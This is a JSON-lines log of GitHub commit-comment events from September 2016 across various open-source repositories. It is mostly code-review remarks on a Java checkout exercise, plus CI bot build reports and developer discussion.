{"id":"4592525083","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104166,"position":28,"line":22,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"66e969128990a72d0f2b73eca2f02cb098a6388e","created_at":"2016-09-20T21:12:42Z","updated_at":"2016-09-20T21:12:42Z","body":"better variable names ``itemQuantity``. Dont shy from having slightly bigger variable names.. They help readability."}},"created_at":"2016-09-20T21:12:42Z"}
{"id":"4592525254","type":"CommitCommentEvent","actor":{"login":"jrodl3r"},"repo":{"name":"reactGo/reactGo"},"payload":{"comment":{"id":19104167,"position":18,"line":3,"path":"app/middlewares/preRenderMiddleware.js","commit_id":"19ef47380d86e6a9e7485b817f8b99073c1f4890","created_at":"2016-09-20T21:12:44Z","updated_at":"2016-09-20T21:12:44Z","body":"What is the reason for the unused `{ location }` param?"}},"created_at":"2016-09-20T21:12:44Z"}
{"id":"4592528449","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104175,"position":47,"line":41,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"66e969128990a72d0f2b73eca2f02cb098a6388e","created_at":"2016-09-20T21:13:19Z","updated_at":"2016-09-20T21:13:19Z","body":"Be aware of **static imports**. You could have used the static import feature here.. "}},"created_at":"2016-09-20T21:13:19Z"}
{"id":"4592533622","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104189,"position":29,"line":23,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"66e969128990a72d0f2b73eca2f02cb098a6388e","created_at":"2016-09-20T21:14:17Z","updated_at":"2016-09-20T21:14:17Z","body":"its high time this block of code should have been refactored. Multiple if / else is bad.. I hope you have refactored it. But it should perhaps been done; sooner rather than later.. "}},"created_at":"2016-09-20T21:14:17Z"}
{"id":"4592540097","type":"CommitCommentEvent","actor":{"login":"choonkending"},"repo":{"name":"reactGo/reactGo"},"payload":{"comment":{"id":19104200,"position":18,"line":3,"path":"app/middlewares/preRenderMiddleware.js","commit_id":"19ef47380d86e6a9e7485b817f8b99073c1f4890","created_at":"2016-09-20T21:15:30Z","updated_at":"2016-09-20T21:15:30Z","body":"Good question! We can remove it as it is unneeded at this time. However,\ntypically we use the location values as part of the API call. I left it\nthere as I thought it would be useful for  people when implementing, and to\nbe aware that it's there.\n\nOn Wed, 21 Sep 2016 07:12 John Rodler <notifications@github.com> wrote:\n\n> What is the reason for the unused { location } param?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/reactGo/reactGo/commit/19ef47380d86e6a9e7485b817f8b99073c1f4890#commitcomment-19104167>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADnMbRmQEf7GoC7Tt2EVagZXtgWCvX0Uks5qsExNgaJpZM4KCJeM>\n> .\n>\n"}},"created_at":"2016-09-20T21:15:30Z"}
{"id":"4592540621","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104204,"position":27,"line":20,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"108bd0631c4fb21ea2119f109c58515ed2dc1082","created_at":"2016-09-20T21:15:37Z","updated_at":"2016-09-20T21:15:37Z","body":"format code.. Having spaces helps readability\r\n\r\n``for (Item item:ItemList) {``\r\n\r\n``for (Item item : ItemList) {``"}},"created_at":"2016-09-20T21:15:37Z"}
{"id":"4592541021","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19104206,"position":null,"line":null,"path":null,"commit_id":"92bcfccfab5365bd1e42990896fb81ba0ef118de","created_at":"2016-09-20T21:15:41Z","updated_at":"2016-09-20T21:15:41Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2313 of 2478 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.34%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T21:15:41Z"}
{"id":"4592543957","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104212,"position":29,"line":22,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"108bd0631c4fb21ea2119f109c58515ed2dc1082","created_at":"2016-09-20T21:16:14Z","updated_at":"2016-09-20T21:16:14Z","body":"better variable name ``ItemQty``??"}},"created_at":"2016-09-20T21:16:14Z"}
{"id":"4592546624","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19104219,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-20T21:16:46Z","updated_at":"2016-09-20T21:16:46Z","body":"Но должно быть другое решение\r\n\r\n21 Сен 2016 г. 0:16 пользователь написал:\r\n\r\nА, я так изначально хотел, но потом по-другому сделал, в ебилде сделал\r\nexport ld_library-path и подправил файл сессии в gnome-session\r\n\r\n20 Сен 2016 г. 22:51 пользователь \"mpkh\" <notifications@github.com> написал:\r\n\r\n@thankjura <https://github.com/thankjura> давно, в Readme есть репозитория\r\n- второй пункт, можно добавить хак в сам ебилд\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub\r\n<https://github.com/Heather/gentoo-gnome/commit/fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5#commitcomment-19102902>,\r\nor mute the thread\r\n<https://github.com/notifications/unsubscribe-auth/ACC31ICrqYfb1DpMnGGJ3ADM9XvpvEdoks5qsDkkgaJpZM4KBwML>\r\n.\r\n"}},"created_at":"2016-09-20T21:16:46Z"}
{"id":"4592546644","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19104218,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-20T21:16:46Z","updated_at":"2016-09-20T21:16:46Z","body":"А, я так изначально хотел, но потом по-другому сделал, в ебилде сделал\r\nexport ld_library-path и подправил файл сессии в gnome-session\r\n\r\n20 Сен 2016 г. 22:51 пользователь \"mpkh\" <notifications@github.com> написал:\r\n\r\n@thankjura <https://github.com/thankjura> давно, в Readme есть репозитория\r\n- второй пункт, можно добавить хак в сам ебилд\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub\r\n<https://github.com/Heather/gentoo-gnome/commit/fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5#commitcomment-19102902>,\r\nor mute the thread\r\n<https://github.com/notifications/unsubscribe-auth/ACC31ICrqYfb1DpMnGGJ3ADM9XvpvEdoks5qsDkkgaJpZM4KBwML>\r\n.\r\n"}},"created_at":"2016-09-20T21:16:46Z"}
{"id":"4592550632","type":"CommitCommentEvent","actor":{"login":"GWRon"},"repo":{"name":"woollybah/TVTower"},"payload":{"comment":{"id":19104230,"position":null,"line":null,"path":null,"commit_id":"98b1724b4c3aee7800eac2ed395e7a2402dedd1b","created_at":"2016-09-20T21:17:30Z","updated_at":"2016-09-20T21:17:30Z","body":"This wont compile with vanilla\r\n\r\n```Compile Error: Unable to convert from 'Object Array' to 'TGUIObject Array'```"}},"created_at":"2016-09-20T21:17:30Z"}
{"id":"4592553393","type":"CommitCommentEvent","actor":{"login":"tboerger"},"repo":{"name":"foopoiuyt/drone-gh-pages"},"payload":{"comment":{"id":19104235,"position":54,"line":54,"path":"plugin.go","commit_id":"ce96d1b73717fa8127349bedcf41c6dd6c03430f","created_at":"2016-09-20T21:18:01Z","updated_at":"2016-09-20T21:18:01Z","body":"Just return the errors, the cli lib will handle printing it "}},"created_at":"2016-09-20T21:18:01Z"}
{"id":"4592554655","type":"CommitCommentEvent","actor":{"login":"ikigorski"},"repo":{"name":"Uniceub-Web-Development-2016-2/Henrique-Gorski"},"payload":{"comment":{"id":19104240,"position":null,"line":null,"path":null,"commit_id":"97c999df9bffd1630db069b73b244c51aef90976","created_at":"2016-09-20T21:18:15Z","updated_at":"2016-09-20T21:18:15Z","body":"Tema e Objetivos + API + Modelagem BD "}},"created_at":"2016-09-20T21:18:15Z"}
{"id":"4592555396","type":"CommitCommentEvent","actor":{"login":"seanm"},"repo":{"name":"libusb/libusb"},"payload":{"comment":{"id":19104244,"position":null,"line":null,"path":null,"commit_id":"73d15d1f8eee372e0609d072f3df705f7de18214","created_at":"2016-09-20T21:18:23Z","updated_at":"2016-09-20T21:18:23Z","body":"\"me.gov\"?  Is that a typo?"}},"created_at":"2016-09-20T21:18:23Z"}
{"id":"4592556630","type":"CommitCommentEvent","actor":{"login":"tboerger"},"repo":{"name":"foopoiuyt/drone-gh-pages"},"payload":{"comment":{"id":19104248,"position":77,"line":77,"path":"plugin.go","commit_id":"ce96d1b73717fa8127349bedcf41c6dd6c03430f","created_at":"2016-09-20T21:18:38Z","updated_at":"2016-09-20T21:18:38Z","body":"Just return it ;)"}},"created_at":"2016-09-20T21:18:38Z"}
{"id":"4592557898","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104252,"position":51,"line":43,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"108bd0631c4fb21ea2119f109c58515ed2dc1082","created_at":"2016-09-20T21:18:52Z","updated_at":"2016-09-20T21:18:52Z","body":"``itemList`` could have been called ``cart`` or ``order`` since thats what it really is\r\n``item`` hence would have been an ``orderLine`` \r\n\r\n**While this is a good move** you are missing one key OO opportunity here.. Think about the **product**. That's an enum dying to be defined \r\n\r\n```\r\nenum Product {\r\nA(50), B(30) etc\r\n}\r\n```"}},"created_at":"2016-09-20T21:18:52Z"}
{"id":"4592558409","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19104253,"position":null,"line":null,"path":null,"commit_id":"b2b743398c356f583efc9a6eed6b845e17211ebe","created_at":"2016-09-20T21:18:57Z","updated_at":"2016-09-20T21:18:57Z","body":"Cool! Sounds very good."}},"created_at":"2016-09-20T21:18:57Z"}
{"id":"4592559182","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19104254,"position":null,"line":null,"path":null,"commit_id":"470271f2a77e92625142dc1cd99c01e16e08d19d","created_at":"2016-09-20T21:19:06Z","updated_at":"2016-09-20T21:19:06Z","body":"Yes, something like the `iter` method and yes, `pop` without a key would return and delete any item in the dictionary. Maybe not very useful if you have `iter`, but a convenience just like `pop` with a key."}},"created_at":"2016-09-20T21:19:06Z"}
{"id":"4592561348","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19104262,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T21:19:31Z","updated_at":"2016-09-20T21:19:31Z","body":"I know FLI interface of Mentor and it's ... ugly ;) We would have to support a bunch of different interfaces as simulators support different ones. The state of VHDL C-interface is sad comparing to the extensively used VPI interface of verilog :("}},"created_at":"2016-09-20T21:19:31Z"}
{"id":"4592563510","type":"CommitCommentEvent","actor":{"login":"tboerger"},"repo":{"name":"foopoiuyt/drone-gh-pages"},"payload":{"comment":{"id":19104266,"position":130,"line":130,"path":"plugin.go","commit_id":"ce96d1b73717fa8127349bedcf41c6dd6c03430f","created_at":"2016-09-20T21:19:55Z","updated_at":"2016-09-20T21:19:55Z","body":"This is left from debugging?"}},"created_at":"2016-09-20T21:19:55Z"}
{"id":"4592563521","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19104267,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-20T21:19:55Z","updated_at":"2016-09-20T21:19:55Z","body":"Add-ons failed: http://jenkins.kodi.tv/job/WIN-32/10006/ Can you check the log?"}},"created_at":"2016-09-20T21:19:55Z"}
{"id":"4592564358","type":"CommitCommentEvent","actor":{"login":"jackwoodward"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19104272,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-20T21:20:04Z","updated_at":"2016-09-20T21:20:04Z","body":"why are keep alive checks disabled on the client side for long polling?\r\n\r\nso it seems that when azure is rolling updates through a cloud service some existing http requests will get dropped without error\r\n\r\nso because the connection dropped out without error the transport is still sitting with open poll request but no server is on the other side to stop it\r\n\r\nso it seems like LongPollingTransport on the client side needs some kind of max poll interval. Maybe that already exists and I missed it"}},"created_at":"2016-09-20T21:20:04Z"}
{"id":"4592564480","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19104273,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T21:20:06Z","updated_at":"2016-09-20T21:20:06Z","body":"Well, actually I'm trying to bind the endgame values with the board geometry (i.e. the lattice topology). As an obvious example, a knight in a corner is generally weak, no matter what exactly is happening on the board, because it can only move to two squares, etc.\nBut I think you're right that the importance of PSQT should decrease in favor of more ad-hoc eval terms..."}},"created_at":"2016-09-20T21:20:06Z"}
{"id":"4592566114","type":"CommitCommentEvent","actor":{"login":"SaraOgaz"},"repo":{"name":"spacetelescope/iraf_replacement"},"payload":{"comment":{"id":19104279,"position":null,"line":null,"path":null,"commit_id":"cc0fe62a73d9b40ddf9989c5db826d27c7a54a14","created_at":"2016-09-20T21:20:22Z","updated_at":"2016-09-20T21:20:22Z","body":"@sosey  Yep... that's the only way Joe and I could think to fix it."}},"created_at":"2016-09-20T21:20:22Z"}
{"id":"4592566565","type":"CommitCommentEvent","actor":{"login":"tboerger"},"repo":{"name":"foopoiuyt/drone-gh-pages"},"payload":{"comment":{"id":19104281,"position":133,"line":133,"path":"plugin.go","commit_id":"ce96d1b73717fa8127349bedcf41c6dd6c03430f","created_at":"2016-09-20T21:20:28Z","updated_at":"2016-09-20T21:20:28Z","body":"Just use Println "}},"created_at":"2016-09-20T21:20:28Z"}
{"id":"4592571307","type":"CommitCommentEvent","actor":{"login":"norizatonz"},"repo":{"name":"adobe/brackets"},"payload":{"comment":{"id":19104289,"position":4,"line":98,"path":"src/extensions/default/CSSCodeHints/CSSProperties.json","commit_id":"a340c3067a44016203ebaa2fa22bd6ced7a668fa","created_at":"2016-09-20T21:21:15Z","updated_at":"2016-09-20T21:21:15Z","body":"add"}},"created_at":"2016-09-20T21:21:15Z"}
{"id":"4592575101","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"jschwartzenberg/dosemu2"},"payload":{"comment":{"id":19104293,"position":19,"line":225,"path":"src/base/init/install.c","commit_id":"91c0e4214511c76ca391f660551eeea57dcc8c67","created_at":"2016-09-20T21:21:55Z","updated_at":"2016-09-20T21:21:55Z","body":"I think you need to check for != -1 before\r\napplying WEXITSTATUS()"}},"created_at":"2016-09-20T21:21:55Z"}
{"id":"4592575222","type":"CommitCommentEvent","actor":{"login":"GWRon"},"repo":{"name":"woollybah/TVTower"},"payload":{"comment":{"id":19104294,"position":null,"line":null,"path":null,"commit_id":"98b1724b4c3aee7800eac2ed395e7a2402dedd1b","created_at":"2016-09-20T21:21:56Z","updated_at":"2016-09-20T21:21:56Z","body":"But BlitzMax does allow this:\r\n\r\n```\r\n\t\tLocal childrenReversedBackup:Object[] = _childrenReversed.ToArray()\r\n\t\t'update added elements\r\n\t\tFor Local obj:TGUIobject = EachIn childrenReversedBackup\r\n```\r\n\r\nSo while you define it as an array of objects, the \"eachIn\" auto-casts so we could do the \"eachin\" with TGUIobject."}},"created_at":"2016-09-20T21:21:56Z"}
{"id":"4592577782","type":"CommitCommentEvent","actor":{"login":"gioele"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19104298,"position":5,"line":28,"path":"travis-scripts/script_linux.sh","commit_id":"aa2dd8f10f7046c1085d40eb1315d11206712947","created_at":"2016-09-20T21:22:21Z","updated_at":"2016-09-20T21:22:21Z","body":"Does `-j4` really improve the compilation time? The Travis documentation says that each VM gets only 1-2 cores, see <https://docs.travis-ci.com/user/ci-environment/#Virtualization-environments>.\r\n\r\nAt the same time it has the disadvantage of making the logs slightly less readable (but that is not a big deal)."}},"created_at":"2016-09-20T21:22:21Z"}
{"id":"4592578565","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104301,"position":5,"line":5,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/vo/Item.java","commit_id":"4abc4cac29f1d4b94091ed934290883378e1df09","created_at":"2016-09-20T21:22:29Z","updated_at":"2016-09-20T21:22:29Z","body":"**Consistency**. Why are some variables defined as private and others arent ?\r\n\r\n* Better variable names. Expand them"}},"created_at":"2016-09-20T21:22:29Z"}
{"id":"4592582946","type":"CommitCommentEvent","actor":{"login":"jensens"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19104312,"position":178,"line":178,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-20T21:23:12Z","updated_at":"2016-09-20T21:23:12Z","body":"replace install by uninstall here"}},"created_at":"2016-09-20T21:23:12Z"}
{"id":"4592585579","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104316,"position":18,"line":18,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/vo/Item.java","commit_id":"4abc4cac29f1d4b94091ed934290883378e1df09","created_at":"2016-09-20T21:23:36Z","updated_at":"2016-09-20T21:23:36Z","body":"not a big fan of setters and getters. Can talk about it.. Basically search for ``immutable domain objects``. Theory goes create a domain object once by passing all params to the constructor and avoid using setters / getters. \r\n"}},"created_at":"2016-09-20T21:23:36Z"}
{"id":"4592590559","type":"CommitCommentEvent","actor":{"login":"labkey-teamcity"},"repo":{"name":"LabKey/cds"},"payload":{"comment":{"id":19104329,"position":null,"line":null,"path":null,"commit_id":"909d0979ffa6e8f59f964da057727211b163b1d0","created_at":"2016-09-20T21:24:29Z","updated_at":"2016-09-20T21:24:29Z","body":"TeamCity LabKey :: LabkeyModules15.2 :: CDS postgres 9.4 [Build 70](https://teamcity.labkey.org/viewLog.html?buildId=363925&buildTypeId=LabkeyModules152_CdsPostgres93) outcome was **FAILURE**\nSummary: Tests failed: 2, passed: 23 Build time: 00:38:30\n### Failed tests\n```\norg.labkey.test.tests.CDSVisualizationTest.verifyBoxPlots: <no details avaliable>\n\norg.labkey.test.tests.CDSTest.verifyHomePage: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T21:24:29Z"}
{"id":"4592590604","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104330,"position":3,"line":3,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/vo/Item.java","commit_id":"4abc4cac29f1d4b94091ed934290883378e1df09","created_at":"2016-09-20T21:24:29Z","updated_at":"2016-09-20T21:24:29Z","body":"This should have been an ``OrderLine`` with the following 3 attributes / variables\r\n* enum Product\r\n* int quantity\r\n* Promotion "}},"created_at":"2016-09-20T21:24:29Z"}
{"id":"4592593757","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19104342,"position":null,"line":null,"path":null,"commit_id":"4067bc4270aedec12ff5f42e9f8d90d2469e800a","created_at":"2016-09-20T21:25:03Z","updated_at":"2016-09-20T21:25:03Z","body":"saw approval from fadushin\nat https://github.com/basho/riak_core/commit/4067bc4270aedec12ff5f42e9f8d90d2469e800a"}},"created_at":"2016-09-20T21:25:03Z"}
{"id":"4592593820","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19104344,"position":null,"line":null,"path":null,"commit_id":"4067bc4270aedec12ff5f42e9f8d90d2469e800a","created_at":"2016-09-20T21:25:04Z","updated_at":"2016-09-20T21:25:04Z","body":"merging basho/riak_core/jv-feature-use_ets_for_riak_core_throttle = 4067bc42 into borshop-integration-861-jv-feature-use_ets_for_riak_core_throttle"}},"created_at":"2016-09-20T21:25:04Z"}
{"id":"4592593845","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19104345,"position":null,"line":null,"path":null,"commit_id":"4067bc4270aedec12ff5f42e9f8d90d2469e800a","created_at":"2016-09-20T21:25:04Z","updated_at":"2016-09-20T21:25:04Z","body":"basho/riak_core/jv-feature-use_ets_for_riak_core_throttle = 4067bc42 merged ok, testing candidate = 040d500e"}},"created_at":"2016-09-20T21:25:04Z"}
{"id":"4592595513","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19104350,"position":null,"line":null,"path":null,"commit_id":"f8a4516651d155312c94bf3e756a7d1f8bade701","created_at":"2016-09-20T21:25:23Z","updated_at":"2016-09-20T21:25:23Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=77)"}},"created_at":"2016-09-20T21:25:23Z"}
{"id":"4592595847","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19104351,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T21:25:27Z","updated_at":"2016-09-20T21:25:27Z","body":"E.g. ModelSim in Altera Quartus has FLI enabled. I tested it with full licence and Starter Edition. GHDL has VPI. I'm working on a VPI/VHPI/FLI build flow for Cocotb for Windows and Linux which doesn't require make.\r\n\r\nThe bigest problem is that you need a compatible!! C and C++ compiler and linker. For QuestaSim all needs to be compiled with the original compiler which was used to compile QuestaSim itself (can be installed)."}},"created_at":"2016-09-20T21:25:27Z"}
{"id":"4592598758","type":"CommitCommentEvent","actor":{"login":"mhomolak"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19104358,"position":46,"line":45,"path":"main.js","commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T21:25:57Z","updated_at":"2016-09-20T21:25:57Z","body":"Got it"}},"created_at":"2016-09-20T21:25:57Z"}
{"id":"4592600472","type":"CommitCommentEvent","actor":{"login":"wangkx"},"repo":{"name":"hpcc-systems/wssql"},"payload":{"comment":{"id":19104363,"position":null,"line":null,"path":null,"commit_id":"576cb2b7cc7c0c21c6fdbec6041d6daa7985ff7f","created_at":"2016-09-20T21:26:14Z","updated_at":"2016-09-20T21:26:14Z","body":"@rpastrana looks fine."}},"created_at":"2016-09-20T21:26:14Z"}
{"id":"4592601434","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104368,"position":3,"line":3,"path":"orderTotalPriceCalculator/src/main/java/com/spark/enums/PromoRules.java","commit_id":"21c2d73e4526da1c8f5255fb1ea897b3f2ebd108","created_at":"2016-09-20T21:26:24Z","updated_at":"2016-09-20T21:26:24Z","body":"I dont know if this is an enum. Would have been better represented by a class. Why not call the class ``GetXForYPromotion``. "}},"created_at":"2016-09-20T21:26:24Z"}
{"id":"4592602167","type":"CommitCommentEvent","actor":{"login":"olmobrutall"},"repo":{"name":"signumsoftware/framework"},"payload":{"comment":{"id":19104370,"position":null,"line":null,"path":null,"commit_id":"6bb182f1d998e7b246011caf84c5c820f0e0ab9d","created_at":"2016-09-20T21:26:32Z","updated_at":"2016-09-20T21:26:32Z","body":"## Signum.React is merged!! \r\n\r\nAfter more than a year of work, two applications in production and one in intensive development finally React and ReactTS2 branches are merged to master!!! 🍾🎬🚀🎁🎉🎊\r\n\r\nI've found some time to update Southwind to make use of React and, more important, update modules.xml so **every new application will be created using Signum.React instead of Signum.Web**.\r\n\r\nSouthwind.Web has been deleted 😳😱😵. Signum.Web and Signum.Web.Extensions are now considered **obsolete** and not being used (at least by me) anymore, so they could start to have bugs or even compilation errors as the Framework evolves and... one soon... they will die ☠️⛪️🕌🕍. In the meantime I'll accept pull request to fix issues in this projects. \r\n\r\nSo if you were waiting for react to be ready to make the jump, today is the day!.\r\n\r\nSignum.React is solid, and the migration easier thanks to code-generation and DynamicComponent. \r\n\r\nCheck https://github.com/signumsoftware/framework/wiki/Signum-React and write your questions in https://gitter.im/signumsoftware/framework?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\r\n\r\nCheers!"}},"created_at":"2016-09-20T21:26:32Z"}
{"id":"4592605602","type":"CommitCommentEvent","actor":{"login":"jensens"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19104381,"position":311,"line":311,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-20T21:27:10Z","updated_at":"2016-09-20T21:27:10Z","body":"instead the @implementer decorator should be used."}},"created_at":"2016-09-20T21:27:10Z"}
{"id":"4592606184","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19104386,"position":276,"line":253,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T21:27:17Z","updated_at":"2016-09-20T21:27:17Z","body":"Here is where I compute the error of velocity in the L2 norm, @yinghe616 "}},"created_at":"2016-09-20T21:27:17Z"}
{"id":"4592608110","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104396,"position":null,"line":null,"path":null,"commit_id":"be8931b145bb0c8bc09c4b23a64ee8d013b547e1","created_at":"2016-09-20T21:27:38Z","updated_at":"2016-09-20T21:27:38Z","body":"This commit has become too complicated.. Have a hard time in understanding what it is trying to do.."}},"created_at":"2016-09-20T21:27:38Z"}
{"id":"4592608765","type":"CommitCommentEvent","actor":{"login":"rameshdharan"},"repo":{"name":"GoogleCloudPlatform/cloud-bigtable-client"},"payload":{"comment":{"id":19104398,"position":null,"line":null,"path":null,"commit_id":"8cb9d3a832bb85df00ed91cf8b1e7dd8285f3c33","created_at":"2016-09-20T21:27:45Z","updated_at":"2016-09-20T21:27:45Z","body":"I still think it's supposed to be protobuff (one f) but not that important obviously "}},"created_at":"2016-09-20T21:27:45Z"}
{"id":"4592608933","type":"CommitCommentEvent","actor":{"login":"taymonbeal"},"repo":{"name":"google/amphtml"},"payload":{"comment":{"id":19104399,"position":45,"line":611,"path":"extensions/amp-a4a/0.1/amp-a4a.js","commit_id":"d18c86254b88a93be57adb3080279bf148b86ece","created_at":"2016-09-20T21:27:46Z","updated_at":"2016-09-20T21:27:46Z","body":"This can just be `return null;`."}},"created_at":"2016-09-20T21:27:46Z"}
{"id":"4592612392","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104405,"position":26,"line":26,"path":"orderTotalPriceCalculator/src/main/java/com/spark/checkout/OrderTotalPriceCalculator.java","commit_id":"097350677b857318b09e64347170403099beab0b","created_at":"2016-09-20T21:28:25Z","updated_at":"2016-09-20T21:28:25Z","body":"neat.. See what DDD can do.. "}},"created_at":"2016-09-20T21:28:25Z"}
{"id":"4592616598","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19104424,"position":null,"line":null,"path":null,"commit_id":"ee7afebc5e3d016db2baff6e14e8e21a02e49a09","created_at":"2016-09-20T21:29:11Z","updated_at":"2016-09-20T21:29:11Z","body":"Didnt review this commit fully. However what you did in the previous step is good. "}},"created_at":"2016-09-20T21:29:11Z"}
{"id":"4592617023","type":"CommitCommentEvent","actor":{"login":"edance"},"repo":{"name":"cooperka/personal-settings"},"payload":{"comment":{"id":19104426,"position":null,"line":null,"path":null,"commit_id":"4272d0c25faccf675f7a2d9f4f10756b7480bba7","created_at":"2016-09-20T21:29:15Z","updated_at":"2016-09-20T21:29:15Z","body":"Ideal"}},"created_at":"2016-09-20T21:29:15Z"}
